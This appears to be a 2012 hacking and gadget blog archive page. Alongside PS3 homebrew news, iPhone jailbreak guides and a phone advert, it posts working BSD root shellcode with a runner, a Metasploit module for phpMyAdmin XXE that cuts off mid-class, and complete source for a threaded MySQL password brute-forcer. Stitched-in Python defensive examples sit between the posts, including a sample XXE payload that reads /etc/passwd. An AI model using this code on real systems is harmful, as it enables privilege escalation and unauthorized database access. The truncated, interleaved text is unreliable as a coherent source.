Jan 22 2012

PS3 Debug Firmware 4.0.1 Leaked

Category: PS3 | admin @ 4:37 pm

Several websites are reporting that a new debug firmware, 4.01, has been leaked. No changelog has been released yet, but I’m sure one will follow once developers catch wind of the update. That said, one does wonder when a retail firmware update will be released. For those who do not know, this firmware is for test/debug developer PlayStation 3s, not the retail machines we the public own.

Sources: playstationlandia.com & ps3-addict.fr


Jan 22 2012

Hack – BSD/x86 execve (‘/bin/sh -c “/etc/master.passwd”‘) setreuid(0,0) Shellcode

Category: Technology | admin @ 4:36 pm
Inj3ct0r >> Exploit database separated by exploit type (local, remote, DoS, etc.)

[+] Site : 1337day.com
[+] Support e-mail : submit[at]1337day.com

I'm KedAns-Dz member from Inj3ct0r Team

/*
###
# Title : bsd/x86 execve ('/bin/sh -c "/etc/master.passwd"') setreuid(0,0) shellcode - 94 bytes
# Author : KedAns-Dz
# E-mail : ked-h@hotmail.com (ked-h@1337day.com) | ked-h@exploit-id.com | kedans@facebook.com
# Home : Hassi.Messaoud (30500) - Algeria -(00213555248701)
# Web Site : www.1337day.com * sec4ever.com * r00tw0rm.com
# Facebook : http://facebook.com/KedAns
# platform : bsd/x86
# Type : Shellcode - 94 Bytes
# BSD's : FreeBSD , OpenBSD , DragonflyBSD
###

##
# | >> --------+++=[ Dz Offenders Cr3w ]=+++-------- << |
# | > Indoushka * KedAns-Dz * Caddy-Dz * Kalashinkov3 |
# | Jago-dz * Over-X * Kha&miX * Ev!LsCr!pT_Dz * Dr.55h |
# | KinG Of PiraTeS * The g0bl!n * soucha * dr.R!dE .. |
# | ------------------------------------------------- < |
##

*/

#include <stdio.h>
#include <string.h>
#include <sys/mman.h>

/* setreuid(0, 0);
 * execve("//bin/sh", {"//bin/sh", "-c", "/bin/sh -c \"/etc/master.passwd\"", NULL}, NULL);
 * exit(0);
 *
 * BSD int $0x80 convention: arguments sit on the stack above a dummy return
 * address, so every syscall is preceded by one extra push. i386 only. */
char sc[] =
    /* setreuid(0, 0) */
    "\x31\xC0"                  // xor    %eax,%eax
    "\x50"                      // push   %eax          euid = 0
    "\x50"                      // push   %eax          ruid = 0
    "\x50"                      // push   %eax          dummy return address
    "\xB0\x7E"                  // mov    $0x7e,%al     SYS_setreuid (126)
    "\xCD\x80"                  // int    $0x80
    /* execve(path, argv, envp) */
    "\x6A\x3B"                  // push   $0x3b         SYS_execve (59)
    "\x58"                      // pop    %eax
    "\x99"                      // cltd                 %edx = 0 (used as NULL)
    "\x52"                      // push   %edx
    "\x68\x2D\x63\x00\x00"      // push   $0x632d       "-c\0\0" (embedded NULs)
    "\x89\xE7"                  // mov    %esp,%edi     %edi -> "-c"
    "\x52"                      // push   %edx
    "\x68\x6E\x2F\x73\x68"      // push   $0x68732f6e   "n/sh"
    "\x68\x2F\x2F\x62\x69"      // push   $0x69622f2f   "//bi"
    "\x89\xE3"                  // mov    %esp,%ebx     %ebx -> "//bin/sh"
    "\x52"                      // push   %edx          argv[] terminator
    "\xE8\x20\x00\x00\x00"      // call   +0x20         jump over the 32-byte string,
                                //                      leaving its address on the stack
    "/bin/sh -c \"/etc/master.passwd\""   // the 31-byte command string ...
    "\x00"                                // ... and its NUL terminator
    "\x57"                      // push   %edi          argv[1] = "-c"
    "\x53"                      // push   %ebx          argv[0] = "//bin/sh"
    "\x89\xE1"                  // mov    %esp,%ecx     %ecx -> argv
    "\x52"                      // push   %edx          envp = NULL
    "\x51"                      // push   %ecx          argv
    "\x53"                      // push   %ebx          path
    "\x50"                      // push   %eax          dummy return address
    "\xCD\x80"                  // int    $0x80
    /* exit(0) */
    "\x31\xC0"                  // xor    %eax,%eax
    "\x50"                      // push   %eax          status = 0
    "\xB0\x01"                  // mov    $0x1,%al      SYS_exit (1)
    "\xCD\x80";                 // int    $0x80

int main(void)
{
    /* strlen() would stop at the first embedded NUL and under-report. */
    size_t len = sizeof(sc) - 1;
    void *mem;

    printf("bytes: %zu\n", len);

    /* .data is not executable on current BSDs, so copy the code into an
     * anonymous RWX mapping before jumping to it. Build with -m32 on amd64. */
    mem = mmap(NULL, len, PROT_READ | PROT_WRITE | PROT_EXEC,
               MAP_PRIVATE | MAP_ANON, -1, 0);
    if (mem == MAP_FAILED) {
        perror("mmap");
        return 1;
    }
    memcpy(mem, sc, len);

    int (*dz)(void) = (int (*)(void))mem;
    dz();
    return 0;
}
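Two checks worth running on shellcode like the one above, as an added Python example that is not part of KedAns-Dz's post: a scan for bytes the delivery channel will not carry (here the NULs in the push of "-c\0\0" and the string terminator, which any strlen()-based length check silently stops at), and a calculator for the displacement of the call-over-string trick, which for the 31-character command plus its terminator must be exactly 0x20. SAMPLE is a constructed fragment of the posted shellcode, not the full payload.

```python
import struct


def find_bad_bytes(shellcode: bytes, bad: bytes = b"\x00") -> dict:
    """Return {bad_byte_value: [offsets]} for every bad byte that appears.

    Offsets are what you need to fix: the instruction containing the byte
    has to be re-encoded (or the string moved) before the payload is usable
    in a NUL-terminated copy.
    """
    hits = {}
    for off, b in enumerate(shellcode):
        if b in bad:
            hits.setdefault(b, []).append(off)
    return hits


def call_over_string(s: bytes) -> bytes:
    """Encode `call rel32` that skips s and its NUL terminator.

    The call pushes the address of the byte after itself, i.e. the string,
    and execution resumes after the string, so the displacement is
    len(s) + 1 (the terminator is part of what must be jumped over).
    """
    return b"\xe8" + struct.pack("<i", len(s) + 1)


def call_target(shellcode: bytes, off: int) -> int:
    """Offset the `call rel32` at `off` lands on; use it to verify that a
    posted call really resumes on the first instruction after the string."""
    if shellcode[off] != 0xE8:
        raise ValueError("no call rel32 at offset %d" % off)
    (disp,) = struct.unpack("<i", shellcode[off + 1:off + 5])
    return off + 5 + disp


# Constructed sample: the setreuid(0,0) prologue, the execve number setup
# and the push of "-c\0\0" (push $0x632D), which is where the NULs come from.
SAMPLE = (bytes.fromhex("31c0505050b07ecd80")
          + b"\x6a\x3b\x58\x99\x52"
          + b"\x68-c\x00\x00")


if __name__ == "__main__":
    print("length:", len(SAMPLE), "bad bytes:", find_bad_bytes(SAMPLE))
    print("call over string:", call_over_string(b'/bin/sh -c "/etc/master.passwd"').hex())
```

call_target() is the check that catches a mis-encoded displacement: a correct call-over-string lands on the `push %edi` right after the terminator, anything else lands in the middle of the string or far outside the buffer.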

#================[ Exploited By KedAns-Dz * Inj3ct0r Team * ]=====================================
# Greets To : Dz Offenders Cr3w < Algerians HaCkerS > || Rizky Ariestiyansyah * Islam Caddy ..
# + Greets To Inj3ct0r Operators Team : r0073r * Sid3^effectS * r4dc0re * CrosS (www.1337day.com)
# Inj3ct0r Members 31337 : Indoushka * KnocKout * SeeMe * Kalashinkov3 * ZoRLu * anT!-Tr0J4n *
# Angel Injection (www.1337day.com/team) * Dz Offenders Cr3w * Algerian Cyber Army * Sec4ever
# Exploit-ID Team : jos_ali_joe + Caddy-Dz + kaMtiEz + r3m1ck (exploit-id.com) * Jago-dz * Over-X
# Kha&miX * Str0ke * JF * Ev!LsCr!pT_Dz * KinG Of PiraTeS * www.packetstormsecurity.org * TreX
# www.metasploit.com * UE-Team & I-BackTrack * r00tw0rm.com * All Security and Exploits Webs ..
#================================================================================================


Jan 22 2012

Hack – phpMyAdmin 3.3.x / 3.4.x Local File Inclusion Via XXE Injection

Category: Technology | admin @ 4:35 pm
# Exploit Title: poc-phpmyadmin-local-file-inclusion-via-xxe-injection
# Date: 12-01-2012
# Author: Marco Batista
# Blog Link: http://www.secforce.com/blog/2012/01/cve-2011-4107-poc-phpmyadmin-local-file-inclusion-via-xxe-injection/
# Tested on: Windows and Linux - phpmyadmin versions: 3.3.6, 3.3.10, 3.4.0, 3.4.5, 3.4.7
# CVE : CVE-2011-4107

require 'msf/core'

class Metasploit3 < Msf::Auxiliary

 include Msf::Exploit::Remote::HttpClient
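The bug class behind CVE-2011-4107 is an XML import parsed with external entities enabled, so a DOCTYPE that declares an entity as `SYSTEM "file:///etc/passwd"` gets expanded into the imported data and echoed back, which is what turns an XXE into a local file read. The following is an added Python example, not phpMyAdmin code and not part of Marco Batista's module: a pre-parse guard that refuses any DOCTYPE or external entity declaration before the document reaches the parser, run against a constructed payload and a constructed benign import (the `<data>/<row>` layout is invented for the example and is not phpMyAdmin's export format).

```python
import re
import xml.etree.ElementTree as ET
from typing import Optional, Tuple

# Constructed sample import carrying the generic XXE shape: an external
# entity pointing at a local file, dereferenced in element content so the
# file's contents end up in the "imported" data.
XXE_IMPORT = b"""<?xml version="1.0"?>
<!DOCTYPE data [
  <!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<data><row><value>&xxe;</value></row></data>"""

# Constructed benign import in the same invented layout.
BENIGN_IMPORT = b"""<?xml version="1.0"?>
<data><row><value>hello</value></row></data>"""

_DOCTYPE = re.compile(rb"<!DOCTYPE", re.IGNORECASE)
# general or parameter (%) entity with an external identifier
_ENTITY = re.compile(rb"<!ENTITY\s+(%\s*)?\S+\s+(SYSTEM|PUBLIC)\b", re.IGNORECASE)


def check_import(xml_bytes: bytes) -> Optional[str]:
    """Return a rejection reason, or None if the document may be parsed.

    A data import has no legitimate need for a DTD at all, so any DOCTYPE is
    refused; external entity declarations are named separately so the log
    says what was attempted. The scan is deliberately conservative: a
    DOCTYPE string inside a comment is also rejected.
    """
    if _ENTITY.search(xml_bytes):
        return "external entity declaration"
    if _DOCTYPE.search(xml_bytes):
        return "DOCTYPE not allowed"
    return None


def parse_import(xml_bytes: bytes) -> ET.Element:
    """Guard first, then parse. Raises ValueError on a rejected document."""
    reason = check_import(xml_bytes)
    if reason is not None:
        raise ValueError("import rejected: " + reason)
    return ET.fromstring(xml_bytes)


def try_import(xml_bytes: bytes) -> Tuple[bool, str]:
    """(True, root tag) on success, (False, reason) on rejection."""
    try:
        return True, parse_import(xml_bytes).tag
    except ValueError as exc:
        return False, str(exc)


if __name__ == "__main__":
    print(try_import(XXE_IMPORT))
    print(try_import(BENIGN_IMPORT))
```

The guard belongs in addition to, not instead of, disabling external entity resolution in the parser itself; the string check is what gives you a log line and a clean error before the parser ever sees the DTD.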


Jan 22 2012

PS3 Solar 3.1 Released – Download

Category: PS3 | admin @ 4:34 pm

Solar v3.1
Changelog:
Fixed bug while removing USB drives; “hot-plugging now works”.
Added more USB devices compatibility.
Added more UI for mp3 player.
Added Exit Dialog interface. “very fast and user friendly”.
Faster Loading to multiMAN and Browser.
Fixed a memory bug.
Fixed hang/crash if MP3s were not found.
Added Message for Hot-plugging and End of Playlist.
Increased Solar’s boot time.
Fixed Keytones, now single beeps, and removed for some keys.
More code cleanup, and other things I can’t remember.

Download: Solar 3.1


Jan 22 2012

PS3 File Manager – XMBFM Beta v0.03R & XMBFM Beta 0.03D Released – Download

Category: PS3 | admin @ 4:33 pm

DeViL303 has released an update to his XMB File Manager, XMBFM, to Beta version 0.03. This time he has released two versions, one for debug XMBs and the other for retail XMBs. Although reports indicated that this was version 0.03, and it was announced as such, once installed you will see that the version number is 0.04; DeViL303 explains why in the quotes below. (Thanks to bitsbubba for pointing this out.)

To Quote:
Originally Posted by DeViL303 via ps3hax.net
I have updated the release to XMBFM Beta v0.03D and XMBFM Beta v0.03R (with D suffix for 3.55 Debug XMBs and R suffix for 3.55 Retail XMBs)

Gonna change the suffix next time as it’s confusing, because “R” could be for Rebug but it’s not; it should work on any 3.55 retail XMB: 3.55 Kmeaw, 3.55 official FW, Rebug 3.55 retail XMB (in Rebug mode), etc.

Quote Originally Posted by DeViL303 via ps3crunch.net
Sorry, 0.03 wasn’t going to get released; 0.04 was supposed to be the first PKG version, but we had a problem with the PKG so I released 0.03 instead. It’s the very same as 0.04 was going to be, it’s just not in a package. 0.03 even says 0.04 in the XMB.

Please note the following:

  • v0.03D is for Debug Rebug Menu
  • v0.03R is for 3.55 OFW, Kmeaw & Retail Rebug Menu

Download: XMBFM Beta v0.03R & XMBFM Beta v0.03D


Jan 22 2012

How To – Install PKG On PS3 Firmware 4.0 Retail OFW

Category: PS3 | admin @ 4:31 pm

Note: This modification does not allow the installation or use of unsigned content, PS3 homebrew, etc. It is purely a convenience hack, aimed at those who have a hardware flasher that allows dual booting.

After technodon’s work creating a modified kiosk dev_flash that lets you install retail-signed package files, the restriction of having to use kiosk firmware inspired me to find a way to add “Install Package Files” to retail firmware.

    This hack does the following:

adds “★ Install Package Files” and “★ /app_home/PS3_GAME/” to “GAME” on the XMB (allowing the user to install retail package files any time they want)
adds other debug functions, which are small but still there
does not give access to “★ Debug Settings” (the reasons are explained below)

    Installation instructions:

This installation procedure is similar to technodon’s original dev_flash HDD swap procedure.

For this you will need two hard drives and an E3 flasher or similar device to downgrade your PS3 (the steps below assume you are on firmware 4.00 and have an E3 flasher).

Downgrade to 3.55 using the downgrade tools from E3 (when downgrading to 3.55, make sure you use a different HDD than the one you were using on 4.00).
Once booted back into the XMB, turn off the console.
Swap hard drives and turn on the system; press the PS button and you will be asked to reinstall the firmware.
Place the PUP file from the E3 downgrade tools in the usual PS3/UPDATE folder on a USB stick and follow the on-screen instructions to reinstall the firmware.
Then install dev_blind.pkg and Blackb0x FTP from Install Package Files.
Run dev_blind, then BlackB0x, and FTP into the console.
Go to /dev_blind, delete everything and replace it with the customised dev_flash.
Press the PS button; the console should reboot and ask to reinstall the firmware again. Switch off the console and swap the hard drive back.
Turn on the console and press the PS button twice.
The console should boot back into 3.55 Rogero.
Go to System Update and install 4.00 OFW.
Once installed, turn the console off again, swap hard drives back, and you should boot into a modified 4.00 retail firmware.

    My package (Click to download) includes:

My modded dev_flash
OFW 4.00 PS3UPDAT.PUP

    P.S. BTW, the “nas_plugin.sprx” in this dev_flash has not been altered to achieve “Install Package Files”. Also, for those who will analyze my modded dev_flash: you will find that I have used debug .sprx files from a debug 4.00 PUP.

    P.P.S. I originally intended to get “★ Debug Settings” working with this, but using “Debug Settings” requires the PS3 to run a debug vsh.self, and that crashes the PS3 when trying to load applications. (I did some other things as well to prevent the PS3 from giving me an RSOD when I swapped the vsh.self files; I’m not detailing them in public because I don’t want Sony to patch it.)


Jan 22 2012

Hacking – MySQL Brute Force Tool

Category: Technology | admin @ 4:27 pm
/*
 * This program is free software; you can redistribute it and/or modify
 * it under the terms of the GNU General Public License as published by
 * the Free Software Foundation; either version 2 of the License, or
 * (at your option) any later version.
 *
 * This program is distributed in the hope that it will be useful,
 * but WITHOUT ANY WARRANTY; without even the implied warranty of
 * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
 * GNU Library General Public License for more details.
 *
 * You should have received a copy of the GNU General Public License
 * along with this program; if not, write to the Free Software
 * Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA 02111-1307, USA.
 *
 * $Id: brute-mysql.c,v 1.1 2012/01/19 22:32:19 james.stevenson Exp $
 *
 * Author:
 * NAME: James Stevenson
 * WWW: http://www.stev.org
 *
 */

#include <stdio.h>
#include <stdlib.h>
#include <stdarg.h>
#include <getopt.h>
#include <string.h>
#include <pthread.h>

#include <mysql/mysql.h>

int verbose = 0;
int total = 0;            /* credential pairs read from stdin */
volatile int quit = 0;    /* set by the first thread that logs in */

/* serialises reads of the username:password list on stdin */
pthread_mutex_t mutex_pass = PTHREAD_MUTEX_INITIALIZER;

struct args {
    char *host;
    char *db;
    int port;
};

void print_help(FILE *fp, char *app) {
    fprintf(fp, "Usage: %s [<options>]\n", app);
    fprintf(fp, "\n");
    fprintf(fp, " -h         Print this help and exit\n");
    fprintf(fp, " -v         Verbose. Repeat for more info\n");
    fprintf(fp, " -t <host>  host to try (default: localhost)\n");
    fprintf(fp, " -p <port>  port to connect on (default: MySQL default)\n");
    fprintf(fp, " -d <db>    database to select on connect (default: mysql)\n");
    fprintf(fp, " -n <num>   number of threads to use\n");
    fprintf(fp, "\n");
    fprintf(fp, "Note: usernames / passwords will be read from stdin\n");
    fprintf(fp, "The format for this is username:password\n");
    fprintf(fp, "\n");
}

/* Returns 1 if username/password authenticates, 0 otherwise. */
int try(char *hostname, char *username, char *password, char *db, int port) {
    MYSQL mysql;
    int ok = 0;

    mysql_init(&mysql);

    if (!mysql_real_connect(&mysql, hostname, username, password, db, port, NULL, 0)) {
        switch (mysql_errno(&mysql)) {
        case 1045: /* ER_ACCESS_DENIED_ERROR: wrong credentials, keep going */
            if (verbose >= 1)
                printf("Failed: %d %s\n", mysql_errno(&mysql), mysql_error(&mysql));
            break;
        default:   /* network error, host blocked, server gone, etc. */
            printf("Unknown Error: %d -> %s\n", mysql_errno(&mysql), mysql_error(&mysql));
            break;
        }
    } else {
        ok = 1;
        if (verbose >= 1)
            printf("Success: %s:%s\n", username, password);
    }

    /* also releases what mysql_init() allocated when the connect failed */
    mysql_close(&mysql);
    return ok;
}

/* Reads the next "username:password" line from stdin into the caller's
 * getline() buffer. Lines without a ':' are skipped. Returns 0 at EOF. */
int getpassword(char **buf, size_t *buflen, char **username, char **password) {
    for (;;) {
        char *tmp;

        pthread_mutex_lock(&mutex_pass);
        if (getline(buf, buflen, stdin) < 0) {
            pthread_mutex_unlock(&mutex_pass);
            return 0;
        }
        total++;
        pthread_mutex_unlock(&mutex_pass);

        tmp = strchr(*buf, ':');
        if (tmp == NULL)
            continue;        /* malformed line, skip it */
        *tmp = 0;
        *username = *buf;
        *password = tmp + 1; /* may legitimately be empty */
        tmp = strchr(*password, '\n');
        if (tmp != NULL)
            *tmp = 0;
        if (verbose >= 2)
            printf("username: %s password: %s\n", *username, *password);
        return 1;
    }
}

void *run(void *p) {
    struct args *a = (struct args *) p;
    char *buf = 0;
    size_t buflen = 0;
    char *user = 0;
    char *pass = 0;

    /* every thread that uses libmysqlclient needs its own thread state */
    mysql_thread_init();

    while (quit == 0) {
        if (getpassword(&buf, &buflen, &user, &pass) == 0)
            break; /* we ran out of passwords */

        if (try(a->host, user, pass, a->db, a->port)) {
            printf("Success! Username: %s Password: %s\n", user, pass);
            quit = 1;
            break;
        }
    }

    free(buf); /* getline() buffer; free(NULL) is a no-op */
    mysql_thread_end();
    return NULL;
}

int main(int argc, char **argv) {
    struct args args;
    pthread_t *thd;
    pthread_attr_t attr;
    int nthreads = 1;
    int i = 0;
    int c, rc;

    memset(&args, 0, sizeof(args));

    while ((c = getopt(argc, argv, "d:hn:p:t:v")) != -1) {
        switch (c) {
        case 'd':
            args.db = optarg;
            break;
        case 'h':
            print_help(stdout, argv[0]);
            exit(EXIT_SUCCESS);
        case 'n':
            nthreads = atoi(optarg);
            break;
        case 't':
            args.host = optarg;
            break;
        case 'v':
            verbose++;
            break;
        case 'p':
            args.port = atoi(optarg);
            break;
        default:
            print_help(stderr, argv[0]);
            exit(EXIT_FAILURE);
        }
    }

    if (args.db == NULL)
        args.db = "mysql";

    if (args.host == NULL)
        args.host = "localhost";

    if (nthreads < 1)
        nthreads = 1;

    thd = malloc(nthreads * sizeof(*thd));
    if (!thd) {
        perror("malloc");
        exit(EXIT_FAILURE);
    }

    /* must run before any thread touches the client library */
    if (mysql_library_init(0, NULL, NULL) != 0) {
        fprintf(stderr, "mysql_library_init failed\n");
        exit(EXIT_FAILURE);
    }

    if ((rc = pthread_attr_init(&attr)) != 0) {
        fprintf(stderr, "pthread_attr_init: %s\n", strerror(rc));
        exit(EXIT_FAILURE);
    }

    if ((rc = pthread_attr_setdetachstate(&attr, PTHREAD_CREATE_JOINABLE)) != 0) {
        fprintf(stderr, "pthread_attr_setdetachstate: %s\n", strerror(rc));
        exit(EXIT_FAILURE);
    }

    for (i = 0; i < nthreads; i++) {
        if ((rc = pthread_create(&thd[i], &attr, run, &args)) != 0) {
            fprintf(stderr, "pthread_create: %s\n", strerror(rc));
            exit(EXIT_FAILURE);
        }
    }

    for (i = 0; i < nthreads; i++) {
        if ((rc = pthread_join(thd[i], NULL)) != 0) {
            fprintf(stderr, "pthread_join: %s\n", strerror(rc));
            exit(EXIT_FAILURE);
        }
    }

    pthread_attr_destroy(&attr);

    free(thd);

    mysql_library_end();

    if (verbose >= 1)
        printf("Tried %d credential pairs\n", total);

    return EXIT_SUCCESS;
}
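From the defender's side a run of this tool leaves a distinctive trail: one source host producing a burst of failed logins (error 1045, the case the code above treats as "keep going") across several usernames, at a rate set by -n. Below is an added Python example, not part of James Stevenson's tool, that flags that pattern in MySQL error-log lines. The log lines are constructed samples in the MySQL 5.5 error-log format and LINE_RE is an assumption about that format, which changes between server versions; failed passwords only reach the error log when the server is configured to log them (log_warnings=2 on 5.5). Note also that max_connect_errors does not help against this tool: it counts interrupted handshakes, not wrong passwords, so a client that completes every handshake is never blocked by it.

```python
import re
from collections import defaultdict, deque
from datetime import datetime

# MySQL 5.5-style "Access denied" line (assumed format; adjust for your version).
LINE_RE = re.compile(
    r"^(?P<ts>\d{6} [ \d]\d:\d{2}:\d{2}) \[(?:Warning|Note)\] "
    r"Access denied for user '(?P<user>[^']*)'@'(?P<host>[^']+)'"
)

# Constructed sample log: a brute-force burst from 10.0.0.5 cycling through
# usernames, plus one unrelated typo'd login from another host.
SAMPLE_LOG = """\
120119 22:32:19 [Warning] Access denied for user 'root'@'10.0.0.5' (using password: YES)
120119 22:32:19 [Warning] Access denied for user 'admin'@'10.0.0.5' (using password: YES)
120119 22:32:20 [Warning] Access denied for user 'mysql'@'10.0.0.5' (using password: YES)
120119 22:32:20 [Warning] Access denied for user 'root'@'10.0.0.5' (using password: YES)
120119 22:32:21 [Warning] Access denied for user 'test'@'10.0.0.5' (using password: YES)
120119 22:32:22 [Warning] Access denied for user 'root'@'10.0.0.5' (using password: YES)
120119 22:40:02 [Warning] Access denied for user 'james'@'192.168.1.20' (using password: NO)
"""


def parse_ts(ts: str) -> datetime:
    return datetime.strptime(ts, "%y%m%d %H:%M:%S")


def detect_bruteforce(log_text: str, threshold: int = 5, window_s: int = 60) -> list:
    """Flag source hosts with more than `threshold` failed logins inside any
    `window_s`-second span.

    One alert per host, describing its worst window: failure count, the
    distinct usernames tried (a username:password list walks many users, a
    misconfigured client retries one), and the window boundaries.
    """
    events = defaultdict(list)  # host -> [(timestamp, user)]
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if m:
            events[m["host"]].append((parse_ts(m["ts"]), m["user"]))

    alerts = []
    for host, evs in events.items():
        evs.sort()
        window = deque()
        best = None
        for ts, user in evs:
            window.append((ts, user))
            # drop events older than the window relative to the current one
            while (ts - window[0][0]).total_seconds() > window_s:
                window.popleft()
            if len(window) > threshold and (best is None or len(window) > best["failures"]):
                best = {
                    "host": host,
                    "failures": len(window),
                    "users": sorted({u for _, u in window}),
                    "start": window[0][0].isoformat(),
                    "end": ts.isoformat(),
                }
        if best is not None:
            alerts.append(best)
    return alerts


if __name__ == "__main__":
    for alert in detect_bruteforce(SAMPLE_LOG):
        print(alert)
```

Tune `threshold` and `window_s` to the site: a single thread of this tool fits a few attempts per second into the window, and each extra -n thread multiplies the rate, so the count in a one-minute window separates a brute force from a user mistyping a password almost immediately.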


Jan 20 2012

How To – Jailbreak iPhone 4S / iPad 2 iOS 5.0.1 Untethered with Greenpois0n Absinthe

Category: iPhone / iTouch / iPad | admin @ 10:21 pm

How to jailbreak iPhone 4S / iPad 2 on iOS 5.0.1 untethered with Greenpois0n Absinthe:

Step 1: Connect your iPhone 4S / iPad 2 to your PC via USB, open iTunes and restore to iOS 5.0.1.

Step 2: Download Greenpois0n Absinthe, then unzip and run the file.

Step 3: Connect your iPhone 4S / iPad 2 to your PC via USB.

Step 4: Click the “Jailbreak” button and follow the steps that appear on the greenpois0n screen.

Step 5: Once completed, you should see an Absinthe icon on the Home screen. Tap it; it will open the GreenPois0n site and then reboot your device. Once it loads again, the Cydia icon will have replaced the Absinthe icon. Now enjoy your iPhone 4S / iPad 2 5.0.1 untethered jailbreak.

Video Tutorial


Jan 20 2012

Jailbreak iPhone 4S and iPad 2 running iOS 5.0.1 Untethered with Greenpois0n Absinthe 1.2.2 for Mac

Category: iPhone / iTouch / iPad | admin @ 10:18 pm

Firmware:

The supported firmware versions will be:

  • iPhone4S: 5.0 (9A334), 5.0.1 (9A405) and the “other” 5.0.1 (9A406)
  • iPad2: 5.0.1 (9A405)
  • Download the firmware

iPhone4S owners looking to maximize their chances of achieving an eventual software-based carrier unlock should be staying at 5.0.  Everyone else should be at 5.0.1.  If you’re an iPhone4S owner who already updated to 5.0.1, it’s too late to go back down to 5.0, but if you’re on 9A406 it is possible to downgrade the BB by going to the 9A405 version of 5.0.1 while the window is still open.

Support:

The overall flow used by the GUI and CLI to inject the A5 corona jailbreak has never been done before, and there may be unforeseen problems once it’s released to the public.  It’s very important for you to sync your data, photos, and music before attempting any version of this jailbreak.  We’ll be watching the comments section below for signs of any widespread problems, but please be aware that you jailbreak at your own risk!

Updates:

  1. If the Absinthe webclip shows “Error establishing a database connection”, please go to Settings, turn on VPN and wait instead.
    • Toggle VPN only AFTER Absinthe says it’s done, or it will not work.
    • VPN SHOULD error and then reboot soon. If it does not, rerun Absinthe!
  2. If you get a strange problem, we advise you to restore your iPhone with iTunes, if you can (i.e. if you’re not on 5.0 waiting for an eventual 4S unlock).

Download Greenpois0n Absinthe 1.2.2 for Mac


Jan 20 2012

Samsung Galaxy Ace – iPhone Alternative

Category: Android | admin @ 4:11 pm

If you have been looking for a suitable alternative to the iPhone, chances are you have spent quite a bit of time finding options that just don’t quite stack up to the dominant Apple product. Partially due to advertisement, partially to the company’s overall success, and also because of its sleek appearance and stunning performance, the Apple iPhone has come to dominate the smart phone market, allowing very few other options to succeed. However, if there is one company that has consistently challenged Apple in the smart phone industry, it is undoubtedly Samsung, which has managed to produce a couple of phones in recent years that rival the iPhone in every category of ratings. The latest in this series of competitors is the Samsung Galaxy Ace, which you can secure through your O2 provider.

One of the most notable features of the Samsung Galaxy Ace is its undeniably “sleek” beauty. While the majority of consumers will certainly tell you that function matters more than appearance, there’s no denying that most people also care about how their phone looks. Well, they don’t get a whole lot nicer than the Galaxy Ace where appearance is concerned, as this little smart phone is a thing of beauty. This may not be enough to tempt you on its own, but when you consider the high functionality of the phone and its strong reviews, you’ll definitely see why this phone is one of the best options out there.

If you do much research on the Galaxy Ace and what differentiates it from its competitors, you will probably see a lot about the 800MHz processor it has, which is one of its most advanced features. Basically, a processor of this calibre allows the Ace to run multiple high-speed programs simultaneously, allowing you extremely advanced and thorough functionality. You will find that with this processor, the phone runs applications and downloads at a much higher speed, allowing you maximum ease and convenience.

Finally, there are also consumer reviews to consider, and it is well worth noting that just about everybody who touches one of these phones loves it. Many note the quick-type “swipe” texting function as a major advantage over other touch screen typing, and the 5 mega-pixel built-in camera also wins over many consumers. As you can see, the Galaxy Ace satisfies a wide variety of different desires you may have in your smart phone, which is why it is well worth considering if you are looking for a new phone.

